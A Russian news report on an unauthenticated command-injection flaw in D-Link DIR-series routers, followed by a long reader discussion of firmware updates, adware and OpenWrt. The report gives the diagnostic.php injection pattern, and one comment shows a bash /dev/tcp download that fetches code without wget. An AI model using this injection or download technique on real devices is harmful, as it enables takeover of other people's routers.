В прошивке беспроводных маршрутизаторов D-Link обнаружена (http://www.s3cur1ty.de/m1adv2013-017) критическая уязвимость, позволяющая инициировать выполнение на устройстве произвольной shell-команды через отправку специально оформленного HTTP-запроса, без прохождения аутентификации. Среди подверженных проблеме устройств отмечаются модели DIR-600, DIR-300 revB, DIR-815, DIR-645, DIR-412, DIR-456 и DIR-110, не исключено, что уязвимость проявляется и для других моделей D-Link.
Проблема вызвана недостаточной проверкой корректности параметра dst в сочетании с отсутствием проверки принадлежности запроса аутентифицированному сеансу. В состав некоторых моделей, таких как DIR-645, входит утилита wget, что позволяет атакующему не только выполнить уже доступные в операционной системе команды, но и организовать загрузку и выполнение своего кода. Эксплуатация уязвимости сводится передаче POST-запроса к скрипту diagnostic.php с указанием команды в форме "act=ping&dst=%26%20COMMAND%26".<center><a href="http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/05... src="http://www.opennet.me/opennews/pics_base/0_1365487069.png" style="border-style: solid; border-color: #e9ead6; border-width: 15px;" title="" border=0></a></center>
Пользователям сетевых устройств D-Link рекомендуется незамедлительно произвести обновление прошивки. Для модели DIR-645 проблема устранена в прошивке v1.04b5, DIR-600 - v2.16B01, DIR-300rev B - 2.14B01. Для других моделей следует ограничить доступ к 80 порту. Интересно, что информация о проблеме была отправлена в D-Link 14 декабря, в ответе от 25 января компания D-Link сообщила, что не считает указанные проблемы уязвимостью, а рассматривает как проблемы на стороне пользователя/браузера, поэтому не собирается выпускать исправление. 7 феварля, после выявление фактов эксплуатации похожей по своей сути уязвимости (http://www.opennet.me/opennews/art.shtml?num=36078) в моделях DIR-600/300, компания D-Link сама связалась с исследователями безопасности для обсуждения выявленнных ими уязвимостей. 5 апреля были выпущены обновления прошивок. Таким образом, на исправление проблемы ушло почти 4 месяца.
URL: http://permalink.gmane.org/gmane.comp.security.bugtraq/51592
Новость: http://www.opennet.me/opennews/art.shtml?num=36631
Спросите у Олега :)
Лучше у Васи
> Спросите у Олега :)Лучше у openwrt. Олег уже мнооого лет не обновляется. И прошивки-деривативы основаны на черти-каких ядрах и прочая.
http://code.google.com/p/wl500g/
Даже название - от доисторической модели роутера взяли. Ну и остальное там такое же примерно.
Дык и что, что доисторической, зато одной из самых толковых...
> Спросите у Олега :)А что за Олег такой?
> А что за Олег такой?Имеются в виду прошивки "от Олега" :). Базировались на каких-то ископаемостях (GPL tarballs) от асуса и в основном предназначались для, собственно, асусовских роутеров, хотя потенциально лезли и в некоторые иные похожие по железу модели :). Были основательно облагорожены (насколько это возможно для тех ископаемых компонентов) неким Олегом. Ряд тупых багов был исправлен, доустановка софта сделана (через ж-у, но все-таки). Некоторые фичи допилили. Так что оно стало нормально работать в извращенских рунетовских сетках с PPTP+DHCP и прочими извратами + не падать под торрентами. И началась эра Асусов. WL500GP и подобных на броадкоме 47хх. На память о данных девайсах есть wl500g.info (aka "asusforum.ru" в древние времена, но сейчас это имя не работает). В свое время асусы буквально заполонили рунетовский рынок. Да и сейчас их по старой памяти довольно много покупают.
Этот самый Олег на это дело потом забил (и те кто "asusforum.ru" регнули видимо тоже), но нашлось сообщество которое подхватило знамя и вроде бы до сих пор кто-то допиливает прошивки этого типа, которые в память о инициаторе затеи так и называются - "олеговские". Вроде как прошивки "той системы" есть и для более новых асусов, etc. А их собирательное название - "олеговские". В память о том кто это первым начал.
Спасибо.
OpenWrt рулит. Во всяком случае на TP-Link.
> OpenWrt рулит. Во всяком случае на TP-Link.И не только там. Как минимум на atheros-based оно the best.
>утилита wget, что позволяет атакующему не только выполнить уже доступные в >операционной системе команды, но и организовать загрузку и выполнение своего кода.я вас разочарую, это можно сделать и без wget
> я вас разочарую, это можно сделать и без wgetКак ? Если можно только доступные в shell команды запускать.
echo bla bla > /tmp/bla
например так:
WGET_HOSTNAME='ftp.gnu.org'
exec {HTTP_FD}<>/dev/tcp/${WGET_HOSTNAME}/80
echo -ne 'GET /gnu/wget/wget-latest.tar.gz HTTP/1.1\r\nHost: '\
${WGET_HOSTNAME}'\r\nUser-Agent: '\
'bash/'${BASH_VERSION}'\r\n\r\n' >&${HTTP_FD}
sed -e '1,/^.$/d' <&${HTTP_FD} >wget-latest.tar.gz
>Пользователям сетевых устройств D-Link рекомендуется незамедлительно произвести обновление прошивки.Производителям сетевых устройств рекомендуется незамедлительно начать разрабатывать систему автоматического обновления
у некоторых уже есть.
>>Пользователям сетевых устройств D-Link рекомендуется незамедлительно произвести обновление прошивки.
> Производителям сетевых устройств рекомендуется незамедлительно начать разрабатывать
> систему автоматического обновленияВот как раз автоматического обновления нам не надо, для этого нам достаточно винды где обновки с бекдорами приходят без спроса
а случись третья мировая то нам вообще кирдык настанет, учитывая то что у Dlinka изначально один порт во внешку открытым держится и много много еще чего интересного касательно винды линухов от АНБ и провайдерских железок от ЦРУ
>Вот как раз автоматического обновления нам не надо,Вам не надо, а нам надо - и чего ?
>а случись третья мировая то нам вообще кирдык настанет
А зачем вы строите стратегически важную инфраструктуру с использованием оборудования вероятного противника ?
Теория заговора тут вообще не катит. Докажу.Не думаю, что вероятного противника интересует пользовательское оборудование типа DIR-300. Скорее выведут из строя роутеры провайдеров, а возможно - только одного, а возможно, только М9. Грубо говоря, нахрен никому не сдалось пользовательское оборудование в норках хомяков, в отличие, кстати, от Windows, которая стоит и на важных государственных и коммерческих объектах.
Итак, просто кривые руки. Всего и делов-то.
> Скорее выведут из строя роутеры провайдеров, а возможно - только одного,
> а возможно, только М9.Как бы реанимировать несколько десятков роутеров - проще чем несколько миллионов. А что вообще можно ожидать от производителей - почитайте стандарт типа blue ray а потом вещать будете о том какие там заговоры. Или нагуглите описание такого замечательного протокола как RRLP. Который позволяет отслеживать вас с высокой точностью и без вашего одобрения.
Еще раз - эти миллионы хомячных устройств нахрен никому не сдались и к ущербу для безопасности страны не имеют ни малейшего отношения. Более того - чем больше этих роутеров усопнет, тем даже лучше для безопасности.Если на основе данных устройств кто-то построил что-то корпоративное, то он просто болван. Для корпоративного использования даже сабж выпускает устройства совсем другого класса. И ценой не 1000 руб. за килограмм живого веса, а 250 тысяч за штуку.
> Еще раз - эти миллионы хомячных устройств нахрен никому не сдались и
> к ущербу для безопасности страны не имеют ни малейшего отношения.Вон там гражданин ботнет на миллион хостов собрал. Такой в принципе завалит все что угодно. И да, "хомячные" роутеры, точки доступа и прочая на самом деле применяются довольно много где. Я думаю что если они все резко факапнутся - вы узнаете довольно много нового о том кто и где их применял :)
> 250 тысяч за штуку.Это, кстати, никак не влияет ни на безопасность, ни на качество, ни на поддержку. Показать фак болвану заплатившему 250 кусков даже приятнее чем тому кто за штуку мешок взял. Тот кто мешок взял при показе фака пойдет и следующий мешок у конкурента купит. Их есть. А вот болван с железкой в 250К никуда не денется. Будет до упора кактус жрать. Потому что заменить такую железку - достаточно сложно. Особенно если он сдуру заложился на нестандартные фирменные фичи.
Случись третья мировая вам (это России, что ли?) кирдык в любом случае - технологический уровень не сравним.
Афганцы, чеченцы и колумбийцы с интересом ознакомились с вашим мнением.
> Афганцы, чеченцы и колумбийцы с интересом ознакомились с вашим мнением.Как показывает опыт мировых войн, интересы небольших стран и народов учитываются только пока они идут в русле интересов одного из крупных игроков.
> Как показывает опыт мировых войн, интересы небольших стран и народов учитываются только
> пока они идут в русле интересов одного из крупных игроков.Как показывает опыт мировых войн, мелкие союзники предпочтительно используются в качестве пушечного мяса для прикрытия более крупной задницы.
>>>Пользователям сетевых устройств D-Link рекомендуется незамедлительно произвести обновление прошивки.
>> Производителям сетевых устройств рекомендуется незамедлительно начать разрабатывать
>> систему автоматического обновления
> Вот как раз автоматического обновления нам не надо, для этого нам достаточно
> винды где обновки с бекдорами приходят без спросаПруфлинк можно?
> Пруфлинк можно?Было дело, в XP апдейтер апдейтился даже если соотвествующие настройки отключены. MS конечно отмазывался что это техническая ошибка, но факты штука упрямая. Думаю если вам интересно - не сильно сложно нагуглить пруфлинки.
XP? У меня Ubuntu.
> XP? У меня Ubuntu.Новость дня.
> XP? У меня Ubuntu.Ну, вам повезло, у вас такой подставы не будет.
> систему автоматического обновления...и вместо рака будет грыжа!
Прикольно будет если у вас девайс убьется обновлением без предупреждения, да? Или если вам без предупреждения некую функцию отрежут, типа как соня с запуском линя. Или если вам туда зальют вполне официальный троян для прослушки траффика.
В общем идиоты и безопасность не совмещаются. Как ни крути. Или некто таки берет руль на себя, или таки его футболят по своим нуждам те или иные силы, законные и не очент, против его воли.
А для желающих взять руль на себя есть например openwrt. Его можно апдейтить под своим чутким контролем. И никто не будет лить левак без спроса.
> Прикольно будет если у вас девайс убьется обновлением без предупреждения, да?Прикольно не будет, а прикольно уже сейчас, когда пользователь SOHO рынка "вынужден" мониторить рассылки по прошивкам роутера, телевизора, медиаплеера и прошивать прошивать прошивать.
Убилось устройство - несёте в сервис центр
Не нравиться такое предложение - отключаете автообноление.А сейчас - стал ваш девайс участником ботнета ... да и пофиг да ? Один фиг вы об этом даже не узнаете
>> Прикольно будет если у вас девайс убьется обновлением без предупреждения, да?
> Прикольно не будет,Действительно, при случае будет просто факап и визит в гарантийку. Что явно хуже чем просто вытряхивание бота ботнета простым ребутом.
> а прикольно уже сейчас, когда пользователь SOHO рынка "вынужден" мониторить
> рассылки по прошивкам роутера, телевизора, медиаплеера и прошивать прошивать прошивать.Прошивка - потенциально опасная операция, которая может вести к закирпичиванию девайса. Поэтому логично если она будет делаться под присмотром юзера, в моменты когда он уверен что питание не гавкнется и прочая.
> Убилось устройство - несёте в сервис центр
А мне оплатят время продолбаное на такие развлечения?
> Не нравиться такое предложение - отключаете автообноление.
В винде уже отключали. А оно все-равно в сеть лезло.
> А сейчас - стал ваш девайс участником ботнета ... да и пофиг
> да ? Один фиг вы об этом даже не узнаетеМой не станет - там openwrt залит и мониторинг состояния налажен. Но вот доверять всяким длинкам и асусом воротить что попало с устройством "по дефолту" мне как-то совсем не хочется. Особенно - глядя на криворукость их программистов. Которые при такой криворукости в два счета очередным апдейтом девайс закирпичат.
>Мой не станет - там openwrt залит и мониторинг состояния налажен.Алилуйя - как это мешает компаниям реализовывать репозитарии прошивок для реализации возможности обновления прямо из устройства ?
Ответ никак не мешает.
> Алилуйя - как это мешает компаниям реализовывать репозитарии прошивок для реализации
> возможности обновления прямо из устройства ?
> Ответ никак не мешает.Никак, только учитывая ж@порукость их програмеров и цели производителей - это создаст больше проблем чем решит, чего доброго. Заключит производитель договор с кем-то из рекламеров и подгрузит, бэть, всем клиентам патчилку траффа, врезающую рекламу за которую уплачено. А кто сказал что производители будут церемониться? Это бизнес, ничего личного.
Подозреваю за такой фокус с ним можно будет отсудить очень много денег всем пользователям их устройств, а уж репутации их это повредит…
> Подозреваю за такой фокус с ним можно будет отсудить очень много денег
> всем пользователям их устройств, а уж репутации их это повредит…И как, много уже у гугель и эпплов поотсудили? И софта с рекламой там навалом. Некоторый софт даже не указывает что будет реклама. Где суды?
Одно дело софт с рекламой в себе, а совсем другое — софт, который вставляет рекламу туда, где её не должно быть. Сравнение некорректно.
> который вставляет рекламу туда, где её не должно быть.Простите, а с чего вы взяли что это вы определяете что "должно" быть? Пока-что производители как видите предпочитают вас не спрашивать.
Приложение лезущее в память или данные других приложений без разрешения пользователя обычно относят к классу вредоносных, а их авторов ищут, ловят и судят. Конечно, если пользователь не заметил как он согласился установить такое приложение и принял его EULA, то это его проблема, но это не тот случай. Ну а даже если не получится ничего отсудить это сильно ударит по репутации фирмы.
Хотя, конечно, чёрный пиар тоже пиар.
> Приложение лезущее в память или данные других приложений без разрешения пользователя обычно
> относят к классу вредоносных,Что-то под ведроидом софт ведет себя как проститутка, а сам ведро-девайс норовит "сбэкапать" пароль от точки доступа на сервак гугля и тому подобные приколы. Очень интересно - когда весь этот гадюшник в ведроиде разгонят и поймают авторов малвари. Видимо, вместе с гугелем во главе, т.к. их софт зачастую ведет себя как разновидность малвари практически.
> а их авторов ищут, ловят и судят.
Что-то у меня сомнения что гугля засудят за вредоносный софт. А надо бы - они конкретно так распаясались.
> Конечно, если пользователь не заметил как он согласился установить такое приложение
> и принял его EULA, то это его проблема,Простите, в половине ведроидных программ даже не сказано в описании что там реклама. Зато когда ты это малваре скачал - реклама начинает вываливаться. И откуда предлагается узнавать - малваре мне вгружают или нет? Мне в свете такого феерического п-ца проще считать весь ведроид и их стор складом с малварью.
Ещё раз для особо одарённых. Программы имеют полное право показывать рекламу во время работы, но они не имеют право вставлять рекламу в _другие_ программы, к ним отношения не имеющие, и в данные этих других программ.
В гуглосторе много бесплатного софта с рекламой в довесок, да. Это нормально.
> Ещё раз для особо одарённых. Программы имеют полное право показывать рекламуА как по моему мнению - если меня о таком не предупредили то это классифицируется как малварь. И хосты подобных пи...сов как самый минимум накрываются на фаере.
> во время работы, но они не имеют право вставлять рекламу в _другие_
> программы, к ним отношения не имеющие, и в данные этих других программ.Знаете, мне все-равно, хотят ли мне нагадить под коврик или в 20 сантиметрах от него. Как по мне - и то и другое примерно одинаковое малваре.
> В гуглосторе много бесплатного софта с рекламой в довесок, да. Это нормально.
Я вот иного мнения. И поэтому предпочитаю нормальный софт из линуксных репов, а не троянизированные поделки от школья.
> то это классифицируется как малварь.Вообще-то это классифицируется как Adware. Последнее делится на программы, которые помимо основной функции показывают рекламу и программы, которые созданы исключительно для показа рекламы.
А вот программа, вставляющая рекламу в другие программы или данные, через них проходящие, относиться к классу malware (если, конечно, пользователь не был достаточно глуп, чтоб санкционировать эти действия — тогда это adware второго типа).
Собственно адварь второго типи часто ещё имеет признаки spyware — не санкционировано изучает содержимое профиля пользователя и систему, отсылает статистику о посещённых сайтах и делает прочие гадости подобного рода. В основном это делается для показа более направленной рекламы, но это их не извиняет.
> примерно одинаковое малваре.
В общем и целом я с тобой согласен, но эти сорта говна таки различаются достаточно значительно, чтоб их не путать.
> Я вот иного мнения. И поэтому предпочитаю нормальный софт из линуксных репов,
> а не троянизированные поделки от школья.Так тебя и не заставляют им пользоваться. Вкати цианоген и нормальный софт, и никогда больше не заходи в стор. :)
> Вообще-то это классифицируется как Adware.Т.е. подвид малвари. Малварью в моем понимании является любая программа которая изволит проявлять незапрошенную нежелательную активность. Это универсальное определение накрывает много классов софта.
> Последнее делится
В сортах г-на не разбираюсь, если честно. Malware и ниипет. Потенциально проблемная/нежелательная активность софта -> малварь. Без разговоров.
> таки различаются достаточно значительно, чтоб их не путать.
Не мои проблемы: я не собираюсь пользоваться малварью в принципе. А в ее сортах пусть аверы разбираются, они за это бабки получают.
> Так тебя и не заставляют им пользоваться. Вкати цианоген и нормальный софт,
> и никогда больше не заходи в стор. :)А нормального софта под ведроид тупо нет. Аналог x-chat например невозможно купить даже за бабки. Зато недоносков на яве с рекламой или за бабки - это да, хоть отбавляй. Только они дружно сливают бесплатному открытому x-chat. С терминалками - так же. С IM - аналогично. В общем какая платформа - такой и софт. Мне эта свалка малваре не требуется, thank you very much.
Ну, вроде, с недавних пор можно теперь и Убунту вкатить, и ещё некоторые дистрибутивы. :)
Не знаю как там с «нормальным» софтом, я смартфонами вообще не пользуюсь.
> Приложение лезущее в память или данные других приложений без разрешения пользователя обычно
> относят к классу вредоносных, а их авторов ищут, ловят и судят.вот ты сейчас любую ОС описал. круто.
С каких пор и какая ОСь модифицирует данные приложений и сами приложения? О_о
ОСь обычно управляет выделением памяти, может перенести блоки в другое место, но с какой радости ей лезть в содержимое этих блоков?
Возможно я что-то упускаю, просвети.
> С каких пор и какая ОСь модифицирует данные приложений и сами приложения?любая современная. настройка релоков — это уже модификация кода. опапуленьки. а если релок указывает в сегмент данных — то ещё и данных. вот так вот неожиданно.
Ну ок, операционные системы исключим. Не хочу переформулировать то утверждение целиком.
Кстати, их и приложениями-то не особо назовёшь.
> Кстати, их и приложениями-то не особо назовёшь.в линуксах, например, загрузчик эльфов — вполне себе приложение. его можно запустить из командной строки.
fix: точнее, закрузчик-настройщик динамически слинкованых эльфов. ld.so, то бишь.
> в линуксах, например, загрузчик эльфов — вполне себе приложение. его можно запустить
> из командной строки.Бывает и круче. Можно взять (e)glibc и ... запустить .so файл как, натурально, программу :). Оно при этом расскажет о том чем является и какой версии. В принципе так можно в любой .so сделать, но требуется какой-то изъ...тый кастомный стартап (в glibc им заморочились). Иначе либа в указанной функции крешится на каждый пшик, т.к. видимо дефолтный стартап код у либ или отсутствует или не инциализирует ничего толком :)
> С каких пор и какая ОСь модифицирует данные приложений и сами приложения? О_оС тех самых. Почитай как кернель операционки работает, овощ. Что такое системные вызовы. Как данные вообще летают между ядром и юзермодом. И ты поймешь насколько же ты не понимаешь как все это работает.
> ОСь обычно управляет выделением памяти, может перенести блоки в другое место, но
> с какой радости ей лезть в содержимое этих блоков?Ну вот получил кернель пакетов по сети. Что он должен сделать чтобы отдать их программе? Правильно - поменять какой-то буффер который доступен программе. Чтение файла? Аналогично - ядро положит запрошенные данные в буфер программы. Но это еще не все! ОС и ее лоадер грузят программы в память, трансформируя их из представления в файле в представление в памяти. Вгружая секции как описано в их заголовках, возможно делая трансформации данных и кода типа relocations, и наконец запуская программу так как описано в оной.
Погоди-погоди, ты слишком глубоко копаешь. ОСь управляет блоками с данными, преобразует их между своими внутренними форматами, но не модифицирует сами данные без требования со стороны приложения. Ну и в конце-концов когда ты ставишь себе ОСь ты сам соглашаешься с тем, что она всё это будет делать. Это ведь её работа и затем ты её и ставишь.
> Ну и в конце-концов когда ты ставишь
> себе ОСь ты сам соглашаешься с тем, что она всё это
> будет делать. Это ведь её работа и затем ты её и
> ставишь.э… можно увидеть в лицензионном соглашении хотя бы одной ОС пункт, который говорит: «устанавливая данное ПО вы согласны с тем, что данное ПО будет по мере необходимости без дополнительных предупреждений вносить изменения в ПО, функционирующее…» короче, я уже запутался, но суть понятна, думаю.
я нигде такого пункта не видел. я, пользователь, не обязан знать, как работает ОС. меня вообще не предупредили, что ОС может по своему желанию менять запущеный мной софт (не только данные, но и код, да). по-моему, ОС — это малварь и троян. такие дела.
Нет такого пункта, но ты сам её ставил для того, чтоб она выполняла функции, которые должна выполнять ОС. Если сам не знаешь какие это функции, то это исключительно твои проблемы. Разве не так?Если вернуться к исходной проблеме, то если производитель роутера, встроивший адварь/малварь в прошивку в очередном апдейте, ухитрится доказать, что это обязательная часть прошивки, без которой устройство не сможет выполнять своих прямых обязанностей, то отвертится. Но кака такую глупость возможно доказать я ума не приложу. Особенно в Европейском или Американском суде.
> Нет такого пункта, но ты сам её ставил для того, чтоб она
> выполняла функции, которые должна выполнять ОС. Если сам не знаешь какие
> это функции, то это исключительно твои проблемы. Разве не так?нет, не так. информацию о системе должен предоставлять производитель, особенно если это проприетарная система. просто неявно подразумевается, что для ОС некоторые действия — ок. однако при большом желании и достаточной упёртости можно найти какой-нибудь corner case, где явного разрешения на изменение не давалось (будем считать, что наличие релоков — явное разрешение). и требовать от производителей ОС или прописывать это в лицензии, или выводить предупреждение перед изменением.
понятно, конечно, что это дурка из разряда текстов «хакер в столовой».
> Но кака такую глупость возможно доказать я ума не приложу.
> Особенно в Европейском или Американском суде.да прописать в лицензии согласие на какой-нибудь «анонимный сбор статистики и удалённую оптимизацию устройства» или подобное.
Вставку рекламных блоков это не объяснит. :)
> Вставку рекламных блоков это не объяснит. :)собирают статистику для улучшения сервиса, чо. %-)
>Прошивка - потенциально опасная операция, которая может вести к закирпичиванию девайса. Поэтому логично если она будет делаться под присмотром юзера, в моменты когда он уверен что питание не гавкнется и прочая.Как раз из-за вами упомянутого логичнее всего если прошивка будет производиться в сервис-центре.
Ну и никто не отменял технологии типо двойного биоса.
> Как раз из-за вами упомянутого логичнее всего если прошивка будет производиться в
> сервис-центре.Это как раз наименее логично - и клиент и сервис убивают время и деньги по самому наихучшему сценарию из всех возможных вообще. То-есть как если бы девайс закирпичился. По поводу чего сама по себе возможность апдейта имеет право быть. Но вот апдейт который происходит сам - потенциально проблемная активность.
> Ну и никто не отменял технологии типо двойного биоса.
Ага, разбежались то - паять вам два чипа вместо одного, или хотя-бы чип двойной емкости. Большинство уважающих себя капиталистов удавится жабой :). Если в миллионном тираже сэкономить полбакса - это 500k$ "нахаляву", уж извините :)
>Но вот доверять всяким длинкам и асусом воротить что попало с устройством "по дефолту" мне как-то совсем не хочется.Берем современные смартфоны, что айфоны что дройдофоны ?
Там есть штатный механизм обновления фабричной прошивки ? Есть !
Может его выполнять пользователь ? Может !
Выполняет ? Да постоянно по всему миру ?
Факапятся в процессе обновления ? Да, бывает и такое, и чего ? лучше вообще не обновляться да ?Чем отличается от роутеров ? Да ничем, только тем что вы тут доказываете что обновление не нужно, а выкладывание бинарников на безымянном ftp видать верх безопасности
> Выполняет ? Да постоянно по всему миру ?Есть некое отличие:
1) Подперто аккумулятором. Не сильно тупой апдейтер проверяет и прикидывает - хватит ли.
2) Там есть юзер-интерфейс и можно спросить у юзеря - мол, скачать? А роутер - пылится в углу. Юзер интерфейс оного никто не видит. Оперативно спросить "а вот тут апдейт приехал - скачать?" - сложновато будет.
>Или если вам туда зальют вполне официальный троян для прослушки траффика.Вы уже проверили вышедшее обновление прошивки из новости на предмет троянов ?
Уверены что там его нет ?>В общем идиоты и безопасность не совмещаются.
Особенно когда компания не в силах сделать :
1 - идентификацию устройства в сети
2 - реализацию "репозитария" прошивок с цифровыми подписями и прочая прочая
3 - встроенный механизм позволяющий устройству обратившись к репозитарию обнаружить факт наличия новой прошивки
4 - механизма уведомления пользователя об необходимости обновленияТогда идиоты из этой компании продолжают писать отмазки 4 месяца, а потом выкладывают на хрен знает каком фтп - некий бинарник.
Вот поэтому надо ставить WRT, а не прошивки от этой чудесной компании.
> 3 - встроенный механизм позволяющий устройству обратившись к репозитарию обнаружить факт наличия новой прошивкиПри работе в режиме бриджа (без собственного IP-адреса) способ сходу в голову не приходит.
> 4 - механизма уведомления пользователя об необходимости обновления
Например? Captive portal? Криков будет...
> При работе в режиме бриджа (без собственного IP-адреса) способ сходу в голову
> не приходит.Справедливости ради, хакнуть именно бридж, у коего айпишника нет - не очень то и простое начинание. А как он пакеты в вебморду при этом получит?
> Справедливости ради, хакнуть именно бридж, у коего айпишника нет - не очень
> то и простое начинание. А как он пакеты в вебморду при
> этом получит?Для ADSL bridge, как вариант, локальный айпишник у него есть, а для общения с сетью на ПК РРРоЕ поднимается (ppp0 рядом с eth0, на вебморду ходим по второму). В сеть, получается, девайс сам не вылезет, глобальный адрес-то не у него. Разве что юзер на хосте NAT включит, и девайсу дефолтный маршрут даст, но кто ж такое будет делать.
К хаку имхо должна быть галка, выключающая администрирование из WAN, по дефолту.
> Для ADSL bridge, как вариант, локальный айпишник у него есть,Вот только извне он недоступен, а хоть как-то туда втиснуться - ну то-есть в теории можно. На практике - целый отдельный гемор.
> Вот только извне он недоступен, а хоть как-то туда втиснуться - ну
> то-есть в теории можно. На практике - целый отдельный гемор.Это да. Я тут встрял когда было про автоматизированный апдейт девайса, то есть с его подачи.
> Уверены что там его нет ?Нет. Поэтому и юзаю openwrt.
> Особенно когда компания не в силах сделать :
> 1 - идентификацию устройства в сетиЭто что и нафига? Может, мне еще поставить вебкам в сортире и гнать с него картинку сразу? А то что-это какие-то левые типы будут лазить по моим устройствам без авторизации?
> 2 - реализацию "репозитария" прошивок с цифровыми подписями и прочая прочая
Учитывая ж@порукость сабжевых програмеров и цели производителей при капитализме - ничего хорошего не выйдет.
И да, знаете, лично меня не устраивает что планшет нагло пи...т пароль от вайфай на сервак гугля "с целью резервного копирования". Самое феноменальное по наглости оправдание СЕТЕВОГО ХАКИНГА за последнее десятилетие. У меня украли пароль ЗАКРЫТОЙ беспроводной сети и слили на посторонние сервера, прикрыв столь неприглядную активность "резервным копированием". Нормально придумано O_O. Это что, роутеры теперь сами будут сливать куда попало пароли, как планшеты? Во зашибись.
> 3 - встроенный механизм позволяющий устройству обратившись к репозитарию обнаружить факт
> наличия новой прошивки
> 4 - механизма уведомления пользователя об необходимости обновленияСамо по себе оно еще куда ни шло. Вот только с учетом ж@порукости програмеров у сабжей и нестыковки желаний юзеров и производителей - большой вопрос станет ли в результате лучше.
> Тогда идиоты из этой компании продолжают писать отмазки 4 месяца, а потом
> выкладывают на хрен знает каком фтп - некий бинарник.Вот по каким-то подобным причинам я и не собираюсь пользоваться их прошивками вообще.
И где же брать прошивку v1.04b5 для DIR-645 если его нет на оф.FTP?
Лучше скажи где мне найти новую прошивку на dir-300 a1.
> Лучше скажи где мне найти новую прошивку на dir-300 a1.зачем? wrt запретили, что ли?
Да как-то смотрел на вот это: http://wiki.openwrt.org/toh/d-link/dir-300
Как-то уж больно много мороки. Хотя теперь, наверное, таки перейду.
ничего, это один раз отмучиться, и всё. %-)
> Как-то уж больно много мороки.Зато вон в TP-link зато льется вообще прямо из вебмордочки. Так, хинт на будущее.
И да, неужели у вас до сих пор именно тот, который
> Atheros AR2317@182MHz
Это ж древний как помет мамонта чипсет. Слоупочный до омерзения. Более современные делаются на ином чипсете - http://wiki.openwrt.org/toh/d-link/dir-300revb (который конечно тоже древний но не настолько).
И кроме того - стоит понимать что тамошние советы могут быть и достаточно древними. Не скажу за конкретно этот длинк, а для rev b там советуют самому транк компилить. Хотя по факту - в -RC уже могут быть образа, т.к. ralink там теперь официально поддерживается.
Да, у меня именно это древний кусок мусора. Работает, пока устраивает. Хотя может и просто поменяю. У меня, кстати, был неприятный опыт с тплинком — на нём IPTV не работало, а на д-линке работало. Впрочем, это было уже очень давно.
> Да, у меня именно это древний кусок мусора.Просто на современных скоростях интернета указанного там проца будет, мягко говоря, маловато. Особенно если не дай боже там PPTP или нечто подобное для выхода в сеть.
> тплинком — на нём IPTV не работало, а на д-линке работало.
Вот про это ничего не скажу - меня какие либо виды TV не интересуют как класс.
> Просто на современных скоростях интернета указанного там проца будет, мягко говоря, маловато.О да, раза два в месяц он у меня гарантированно «захлёбывается» и уходит в полный ступор.
> меня какие либо виды TV не интересуют как класс.
Если б я один на тот момент этим инетом пользовался, то и меня б не волновало.
> О да, раза два в месяц он у меня гарантированно «захлёбывается» и уходит в полный ступор.А это скорее всего обезьяны из длинка таблицу conntrack указали крупнее чем у девайса есть оперативы. Вот и наступает момент когда в системе закончилась память а откусить негде, т.к. все под таблицу соединений ядром сожрано. Там еще и таймауты трекинга конские бывают, часов на шесть. Чем длинк так упарывается - вопрос интересный. Ну а когда в системе кончилась RAM - упарывается уже девайс. По этому поводу пользоваться родными прошивками от длинка можно советовать только врагам. А самому это непотребство можно использовать с чем-то типа openwrt разве что. Там обычно нормальные параметры контрека при сборке выставляют, более соответствующие тому что реально потянет девайс. И таймауты разумнее.
>> меня какие либо виды TV не интересуют как класс.
> Если б я один на тот момент этим инетом пользовался, то и меня б не волновало.Просто насчет IP телевидения я знаю только то что оно существует. Где-то там. О его проблемах и как это работает - я не в курсе, извините. Не интересуют меня зомбоящики. Ни в каком виде.
в dir-300 rev B, кстати, льётся через веб-морду. и через стандартный апдейт и через рекавери бут.
У меня уже давно нет d-link'а, борьба с 3-мя моделями закончилась уходом на другого вендора...
> У меня уже давно нет d-link'а, борьба с 3-мя моделями закончилась уходом на другого вендора...какого?
(какой вообще был смысл писать это сообщение, если не называть на кого имено была замена?).
Давно сменил это гагно на Зухель - рад.
Осталось сменить Зухель и прочее гуано на Mikrotik. За те же деньги (а зачастую и дешевле) получается большая производительность по железу, и несоизмеримо большее кол-во плюшек. В настоящее время Олеги и прочие кастомные прошивки на железе как у вышеописанных длинков неактуальны, т.к. на каналах 100mbps с торрентами, такая железочка во-первых не прокачивает всю полосу, во-вторых cpuload такого роутера редко когда бывает меньше 100%
> Осталось сменить Зухель и прочее гуано на Mikrotik. За те же деньги
> (а зачастую и дешевле) получается большая производительность по железу,Зато софт совершенно мудацкий. И какими-то лицензиями пытаются барыжить, упорыши, бэть. Сделать из дебиан-линукса цыску - парни конкретно упоролись. Хотя иногда лошье ведется.
А проц там - в самом лучшем случае в недорогих юзается AR7161. Самый обычный. Такой же часто пихают в топовые модели домаших роутеров. Обычный MIPS на 680МГц. Да, 100Мбит отроутит. И в любой машинке с оным памяти хватит на большой контрек. И это не заслуга микротика. Просто резвый проц. Так что возносить микротик - нет никакого смысла. Тем более что дефолтный софт там на редкость гадостный и ограниченный. Модели с usb например - вообще кривые. В целом - достаточно укуреннвая контора.
Dir-300 NRU прошивка Wive-NG-RTNL, роутит под 100 Мбит при минимальной нагрузке на CPU
> Dir-300 NRU прошивка Wive-NG-RTNL, роутит под 100 Мбит при минимальной нагрузке на CPUТолько вот у длинка есть туева хуча ревизий и далеко не все из них поддерживаются указанной прошивкой.
http://gregsowell.com/wp-content/uploads/2012/08/new2011.png
Я тоже сменил после того как dir-655 начал мне мозг компосировать с SIP ALG. как я его выключать не побовал... потом прошивка ставилась на раутер с default settings only. кароч был у меня juniper gss5 который служит теперь верой и правдой.
Гагага, ждите больше обновлений от длинка. Форум на половину состоит из гневых постов, из-за чего, я так подозреваю, был отключён чуть ли не на полтора месяца, лол. Да что говорить, разработчики неудосуживаются писать списки изменений. Длинк - вы шарага.
> Гагага, ждите больше обновлений от длинка. Форум на половину состоит из гневых
> постов, из-за чего, я так подозреваю, был отключён чуть ли не на полтора месяца, лол.Походу длинк учится методам работы у почты россии :)
TP-Link TL-WR1043ND + DD-WRT.
TP-Link TL-WR1043ND + OpenWrt. Пашет круглосуточно без нареканий.
> TP-Link TL-WR1043ND + OpenWrt. Пашет круглосуточно без нареканий.И вообще, в новых openwrt морда довольно фичастая.
А это не боян? (новость не читал)
на мой d-link dwl-2100ap новых прошивок нету, наверное все хорошо )))
dd-wrt, все шикарно
Есть неплохая прошивка Wive-NG-RTNL
> Есть неплохая прошивка Wive-NG-RTNLВот только она поддерживет полтора чипсета. А у длинка в чипсетах - мягко говоря зоопарк.
